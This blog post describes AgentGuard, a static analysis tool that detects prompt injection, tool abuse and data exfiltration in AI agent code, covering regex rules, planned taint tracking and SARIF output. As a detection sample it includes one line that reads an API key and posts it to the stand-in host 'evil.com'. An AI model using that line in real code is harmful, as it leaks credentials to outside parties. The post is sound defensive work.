DEV Community

Dockfix Labs

Beyond Regex: Building Detection Rules for AI Agent Vulnerabilities


When I started building AgentGuard, the first question was: how do you detect a prompt injection vulnerability in source code?

Unlike traditional vulnerabilities such as SQL injection or XSS, prompt injection doesn't have a single signature. It's a pattern of untrusted data flowing into an LLM's context. The vulnerability isn't in any one function call; it's in how the prompt is assembled from that data.

The Regex Foundation

Every SAST tool starts with pattern matching. AgentGuard's first layer is regex-based rules:

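import re

# ASI01: Prompt Injection
# Flags text where prompt, system, message, or instruction is followed
# (after optional whitespace) by ':' or '=' and then an f-string that
# contains a {...} interpolation. Matching is case-insensitive.
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)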

This catches the most common pattern: f-strings that embed variables, such as user input, directly into LLM prompts. It is blunt but effective. In a scan of 50 open-source agent codebases, this single rule flagged 127 instances.
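A regex layer like this usually amounts to a table of compiled patterns applied line by line. The sketch below assumes that design. Only the ASI01 pattern comes from this article. The rule table, the scan helper, and the ASI02 pattern are hypothetical. The ASI02 pattern is an illustrative guess at the os.system/subprocess/eval rule, not AgentGuard's code.

```python
import re

# Hypothetical rule table: ASI ID -> compiled pattern.
RULES = {
    # ASI01 exactly as shown in the article.
    "ASI01": re.compile(
        r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}', re.I
    ),
    # ASI02: an illustrative guess, not AgentGuard's actual rule.
    "ASI02": re.compile(r'\b(?:os\.system|subprocess\.\w+|eval)\('),
}


def scan(source: str) -> list[tuple[str, int, str]]:
    """Return (rule ID, 1-based line number, stripped line) for every match."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for rule_id, pattern in RULES.items():
            if pattern.search(line):
                findings.append((rule_id, lineno, line.strip()))
    return findings


SAMPLE = '''
prompt = f"Summarize this: {user_input}"
greeting = f"Hello {name}"
os.system(llm_output)
'''

for finding in scan(SAMPLE):
    print(finding)
```

As written, the ASI01 pattern does not fire on a message dict such as {"role": "system", "content": f"Rules: {rules}"}. The closing quote after system sits between the keyword and the colon, so the pattern cannot reach the f-string.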

The Problem with Regex

Regex has limits. Consider:

# Pattern A: Obvious
prompt = f"You are a helper. {user_input}"

# Pattern B: Subtle
template = "You are a helper. {input}"
prompt = template.format(input=user_data)

# Pattern C: Hidden
messages = [{"role": "system", "content": config["system_prompt"] + user_message}]

Pattern A is trivial to detect. Pattern B requires understanding .format() semantics. Pattern C requires tracking data flow through list and dict literals and string concatenation.
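Running the ASI01 rule against the assignment lines from the three patterns makes the gap concrete. This minimal check uses only Python's re module, and only Pattern A matches.

```python
import re

# The ASI01 rule exactly as shown earlier in the article.
FSTRING_INJECTION = re.compile(
    r'(?:prompt|system|message|instruction)\s*[:=]\s*f["\'].*\{.*\}',
    re.I,
)

# The assignment lines from Patterns A, B and C.
PATTERNS = {
    "A": 'prompt = f"You are a helper. {user_input}"',
    "B": "prompt = template.format(input=user_data)",
    "C": 'messages = [{"role": "system", "content": config["system_prompt"] + user_message}]',
}

results = {name: bool(FSTRING_INJECTION.search(line)) for name, line in PATTERNS.items()}
print(results)  # {'A': True, 'B': False, 'C': False}
```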

This is where AgentGuard is headed next: AST-based semantic analysis.

The AST Layer (Roadmap)

The next version of AgentGuard will parse Python and JavaScript ASTs to track taint flow:

  1. Identify sources: function parameters named user_input, query, or message, plus request fields such as request.body
  2. Track propagation: variable assignments, string formatting, list/dict construction
  3. Identify sinks: calls such as openai.chat.completions.create, and arguments or variables named prompt, messages, or system
  4. Flag paths: any path from source to sink without sanitization

This is the same approach Semgrep and CodeQL use for traditional vulnerabilities, but specialized for LLM-specific sinks.
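The four steps can be approximated with Python's standard ast module. This is a minimal, intra-procedural sketch, not AgentGuard's planned implementation. The source, sink, and sanitizer names, including the sanitize function, are hypothetical. Sinks are limited to keyword arguments, and statements are visited in line order, so branches and loops are ignored.

```python
import ast

# Hypothetical source, sink and sanitizer names loosely based on the roadmap above.
SOURCE_PARAMS = {"user_input", "query", "message"}
SINK_KEYWORDS = {"prompt", "messages", "system"}
SANITIZERS = {"sanitize"}  # calls to these functions are treated as removing taint


def reads(node: ast.AST) -> set[str]:
    """Return the variable names an expression reads, skipping sanitizer calls."""
    if (
        isinstance(node, ast.Call)
        and isinstance(node.func, ast.Name)
        and node.func.id in SANITIZERS
    ):
        return set()
    if isinstance(node, ast.Name):
        return {node.id}
    found: set[str] = set()
    for child in ast.iter_child_nodes(node):
        found |= reads(child)
    return found


def find_taint_paths(code: str) -> list[tuple[str, int]]:
    """Return (function name, line) for each sink call that receives tainted data."""
    findings = []
    for func in ast.walk(ast.parse(code)):
        if not isinstance(func, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        params = func.args.posonlyargs + func.args.args + func.args.kwonlyargs
        # Step 1, sources: suspiciously named parameters start out tainted.
        tainted = {a.arg for a in params if a.arg in SOURCE_PARAMS}
        # Visit assignments and calls in source order. This straight-line
        # approximation ignores branches, loops and attribute/subscript targets.
        nodes = [n for n in ast.walk(func) if isinstance(n, (ast.Assign, ast.Call))]
        nodes.sort(key=lambda n: (n.lineno, n.col_offset))
        for node in nodes:
            if isinstance(node, ast.Assign):
                # Step 2, propagation: f-strings, .format(), "+" and list/dict
                # literals all read the tainted name somewhere in the RHS.
                is_tainted = bool(reads(node.value) & tainted)
                for target in node.targets:
                    if isinstance(target, ast.Name):
                        if is_tainted:
                            tainted.add(target.id)
                        else:
                            tainted.discard(target.id)
            else:
                # Steps 3 and 4, sinks: flag sink keywords fed by tainted data.
                for kw in node.keywords:
                    if kw.arg in SINK_KEYWORDS and reads(kw.value) & tainted:
                        findings.append((func.name, node.lineno))
                        break
    return findings


SAMPLE = '''
def answer(user_input, client):
    template = "You are a helper. {input}"
    prompt = template.format(input=user_input)
    msgs = [{"role": "system", "content": prompt}]
    return client.chat.completions.create(model="example-model", messages=msgs)

def safe(user_input, client):
    cleaned = sanitize(user_input)
    msgs = [{"role": "user", "content": cleaned}]
    return client.chat.completions.create(model="example-model", messages=msgs)
'''

print(find_taint_paths(SAMPLE))  # [('answer', 6)]
```

Both functions build a prompt from user_input, but only answer is reported, because safe routes the value through the hypothetical sanitizer first. The .format() call from Pattern B and the list, dict, and "+" constructs from Pattern C need no special handling. Taint propagates whenever a tainted name is read anywhere on the right-hand side.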

Correlation Detection

AgentGuard already does a simple form of correlation for ASI03 (Data Exfiltration):

import os
import requests

api_key = os.environ.get("API_KEY")  # line N: secret access
requests.post("https://evil.com/collect", headers={"Auth": api_key})  # line N+1: network call

The rule checks whether a secret-access pattern appears on line N and a network-call pattern appears on line N+1. This catches the most dangerous case: an agent that reads a credential and immediately sends it to an external host.
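The line-pair check can be sketched with two regexes. The patterns are hypothetical stand-ins for AgentGuard's ASI03 rules. One covers os.environ and os.getenv reads, and the other covers requests, httpx, and urlopen calls.

```python
import re

# Hypothetical patterns; AgentGuard's real ASI03 rules may differ.
SECRET_ACCESS = re.compile(r'os\.(?:environ\.get|getenv)\(|os\.environ\[')
NETWORK_CALL = re.compile(r'\b(?:requests|httpx)\.(?:get|post|put)\(|\burlopen\(')


def correlate(source: str) -> list[int]:
    """Return 1-based line numbers where a secret read is followed by a network call."""
    lines = source.splitlines()
    hits = []
    for n in range(len(lines) - 1):
        if SECRET_ACCESS.search(lines[n]) and NETWORK_CALL.search(lines[n + 1]):
            hits.append(n + 1)  # report the line holding the secret access
    return hits


SNIPPET = '''api_key = os.environ.get("API_KEY")
requests.post("https://evil.com/collect", headers={"Auth": api_key})'''

print(correlate(SNIPPET))  # [1]
```

The check only compares adjacent lines, so a blank line or any other statement between the two hides the pair. Function-level taint tracking would close that gap.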

Future versions will extend this to full function-level taint tracking.

The OWASP ASI Top 10 Coverage

AgentGuard currently covers all 10 categories:

| ASI | Rule | Detection Method |
|---|---|---|
| ASI01 | Prompt Injection | Regex (f-string, concat, format) |
| ASI02 | Tool Abuse | Regex (os.system, subprocess, eval) |
| ASI03 | Data Exfiltration | Regex + cross-line correlation |
| ASI04 | Excessive Agency | Regex (auto-execute, no-confirm) |
| ASI05 | Supply Chain | Regex (untrusted pip install, dynamic import) |
| ASI06 | Insecure Output | Regex (raw HTML, eval output) |
| ASI07 | Credential Exposure | Regex (API keys, private keys, passwords) |
| ASI08 | Context Manipulation | Regex (context stuffing, token bombing) |
| ASI09 | Agent Loop Exploitation | Regex (recursive calls, no depth limit) |
| ASI10 | Trust Boundary | Regex (mixed privilege, cross-agent calls) |

Benchmark Results

The benchmark suite has 28 samples, covering five of the ten categories plus clean code:

  • ASI01 (6 samples): 100% detection
  • ASI02 (5 samples): 100% detection
  • ASI03 (4 samples): 100% detection
  • ASI07 (6 samples): 100% detection
  • ASI10 (5 samples): 100% detection
  • Clean (2 samples): 0% false positives

What's Next

  1. AST-based taint tracking for Python and JavaScript
  2. Language support: Rust, Go, Java
  3. GitHub Code Scanning integration via SARIF
  4. MCP server mode for real-time scanning in AI coding assistants
  5. Semantic injection detection: understanding prompt structure, not just string patterns
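The core of a SARIF 2.1.0 log, the format behind the SARIF integration item, is small. It holds a run with a tool driver and a list of results, and each result carries a rule ID, a message, and a physical location. This sketch assumes a hypothetical (rule ID, path, line, message) finding format. The file path and message are made up for illustration.

```python
import json

# Hypothetical finding tuples: (rule ID, file path, line, message).
FINDINGS = [
    ("ASI01", "agent/app.py", 12, "User input interpolated into system prompt"),
]


def to_sarif(findings, tool_name="AgentGuard"):
    """Build a minimal SARIF 2.1.0 log from (rule_id, path, line, message) tuples."""
    rule_ids = sorted({rule_id for rule_id, _, _, _ in findings})
    return {
        "version": "2.1.0",
        "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
        "runs": [
            {
                "tool": {
                    "driver": {"name": tool_name, "rules": [{"id": r} for r in rule_ids]}
                },
                "results": [
                    {
                        "ruleId": rule_id,
                        "level": "warning",
                        "message": {"text": message},
                        "locations": [
                            {
                                "physicalLocation": {
                                    "artifactLocation": {"uri": path},
                                    "region": {"startLine": line},
                                }
                            }
                        ],
                    }
                    for rule_id, path, line, message in findings
                ],
            }
        ],
    }


print(json.dumps(to_sarif(FINDINGS), indent=2))
```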

The long-term goal is simple: make AI agent code as auditable as web application code. We have Semgrep for web apps. We need AgentGuard for agent apps.


AgentGuard is MIT-licensed and open source. Install with pip install dfx-agentguard.
